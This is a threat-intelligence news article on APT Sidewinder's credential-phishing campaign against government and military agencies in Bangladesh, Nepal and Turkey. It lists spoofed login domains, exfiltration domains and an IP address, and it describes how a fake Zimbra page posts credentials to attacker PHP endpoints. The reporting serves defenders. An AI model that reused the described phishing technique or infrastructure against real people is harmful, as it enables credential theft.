APT Sidewinder, a persistent threat actor believed to originate from South Asia, has launched a sophisticated credential harvesting campaign targeting government and military entities across Bangladesh, Nepal, Turkey, and neighboring countries.
The group has demonstrated remarkable adaptability in their phishing techniques, creating convincing replicas of official login portals to steal sensitive authentication credentials from high-value targets.
The campaign primarily leverages spear-phishing attacks through weaponized documents and malicious links that mimic legitimate government communications.
.webp "APT Sidewinder Spoofs Government and Military Institutions to Steal Login Credentials 3")
By impersonating trusted institutions, the threat actors successfully trick victims into entering their credentials on fraudulent login pages designed to capture and exfiltrate authentication data to attacker-controlled servers.
Hunt.io analysts identified the operation after investigating a phishing attack targeting Nepal’s Ministry of Defense, which led to the discovery of a broader infrastructure spanning multiple countries and government agencies.
The investigation revealed over a dozen phishing domains, each carefully crafted to mimic different agencies including DGDP, DGFI, Bangladesh Police, and Turkish defense contractors like ASELSAN and ROKETSAN.
The attackers demonstrate sophisticated operational security by utilizing free hosting services like Netlify and Pages.dev to rapidly deploy phishing infrastructure while maintaining redundancy across multiple collection endpoints.
.webp "APT Sidewinder Spoofs Government and Military Institutions to Steal Login Credentials 4")
This approach allows them to quickly establish new attack vectors when existing domains are detected and blocked.
Infrastructure Analysis and Credential Collection Methods
The technical analysis reveals APT Sidewinder’s systematic approach to credential harvesting through centralized collection infrastructure.
The group employs two primary credential exfiltration domains: mailbox3-inbox1-bd.com and mailbox-inbox-bd.com, both resolving to IP address 146.70.118.226 hosted by M247 Europe SRL in Frankfurt, Germany.
The phishing pages utilize sophisticated POST request mechanisms to silently transmit stolen credentials. For example, a fake Zimbra login page hosted at mail-mod-gov-np-account-file-data.netlify.app contains JavaScript code that submits user credentials to https://mailbox3-inbox1-bd.com/3456.php through concealed form submissions.
The HTML source code maintains authentic titles like “Zimbra Web Client Sign In” to enhance credibility while executing malicious backend operations.
The campaign demonstrates infrastructure reuse across different targeting scenarios, with consistent backend scripts like /2135.php and /idef.php being deployed across multiple phishing kits.
This template-based approach indicates automated deployment capabilities, allowing the threat actors to rapidly scale their operations while maintaining operational continuity even when individual URLs are compromised or blocked.
Equip your SOC with full access to the latest threat data from ANY.RUN TI Lookup that can Improve incident response -> Get 14-day Free Trial
Source link
